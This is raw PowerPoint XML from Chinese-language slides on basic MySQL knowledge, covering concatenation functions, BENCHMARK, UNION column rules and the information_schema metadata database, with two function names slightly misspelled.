                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>将多个字符串连接成一个字符串</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="100845" marR="100845" marT="50422" marB="50422"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3376141775"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="432046">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Group_cocat</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>()</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="100845" marR="100845" marT="50422" marB="50422"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
                        <a:t>将查询的结果连接成一个字符串</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="100845" marR="100845" marT="50422" marB="50422"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4233359899"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="432046">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Cocat_ws</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>char,x,y</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="100845" marR="100845" marT="50422" marB="50422"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
                        <a:t>将</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
                        <a:t>x</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
                        <a:t>和</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
                        <a:t>y</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
                        <a:t>查询的结果用</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
                        <a:t>char</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
                        <a:t>连接成一个字符串</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="100845" marR="100845" marT="50422" marB="50422"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="166135153"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="432046">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>BENCHMARK(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>count,expr</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="100845" marR="100845" marT="50422" marB="50422"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
                        <a:t>将表达式</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
                        <a:t>expr</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
                        <a:t>执行</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
                        <a:t>count</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
                        <a:t>遍</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="100845" marR="100845" marT="50422" marB="50422"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3234115278"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3156942126"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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DFB0F556-322F-4195-A26F-D450CB32EDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-46653" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3BA2E8-15E4-49CF-8527-10DF42B34BFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C954BF19-1EB9-4D05-8091-63E424CB6D0E}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9599D275-CA36-41A2-8DB6-ECB9A1C0FE9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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA29A3A-9B30-4E90-86BC-7279374CFA7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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1758681A-DE36-4659-817E-92F14A73E024}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形: 圆角 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E5B8900-D99B-4021-B8B4-486AD244BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="447869" y="424690"/>
            <a:ext cx="11315141" cy="6008620"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内部的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时，每条 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>句中的列的顺序必须相同。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B73F94C-56E8-4838-B55D-D266938D73E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6335090" y="347084"/>
            <a:ext cx="5427920" cy="708964"/>
            <a:chOff x="668080" y="698156"/>
            <a:chExt cx="5592043" cy="1016344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABBE8C0-A59E-448A-B0CA-DB618E0631FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5613564" y="698156"/>
              <a:ext cx="646559" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2D4AA"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59C1A43-258D-4810-BCBC-FBE5A4155111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="668080" y="698156"/>
              <a:ext cx="5099674" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="文本框 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D325D91C-7E6F-4BB8-837B-06D7EEFC0629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1021624" y="701566"/>
            <a:ext cx="3447063" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>基本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>知识</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C33A93AA-ABC9-4F7D-964B-2A5FAFCF92C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1669622" y="1363947"/>
            <a:ext cx="5083443" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>information_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>库</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{081A991A-B486-4853-AF19-13A219650730}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="706785" y="1939550"/>
            <a:ext cx="10944040" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>information_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>数据库是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>自带的，它提供了访问数据库元数据的方式。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8897F717-6658-4297-8F10-22979BA3DDFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677197" y="2751952"/>
            <a:ext cx="11066934" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>什么是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>元数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>呢？元数据是关于数据的数据，如数据库名或表名、列的数据类型，或访问权限。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="矩形 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C272F2AB-1251-4406-A698-9913B8D15689}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677198" y="3682848"/>
            <a:ext cx="10973628" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>information_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>中，有数个只读表。它们实际上是视图，而不是基本表，其中保存着关于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>服务器所维护的所有其他数据库的信息。如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>数据库名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>数据库的表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>表栏的数据类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>与访问权限等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="980635498"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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DFB0F556-322F-4195-A26F-D450CB32EDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-46653" y="0"/>
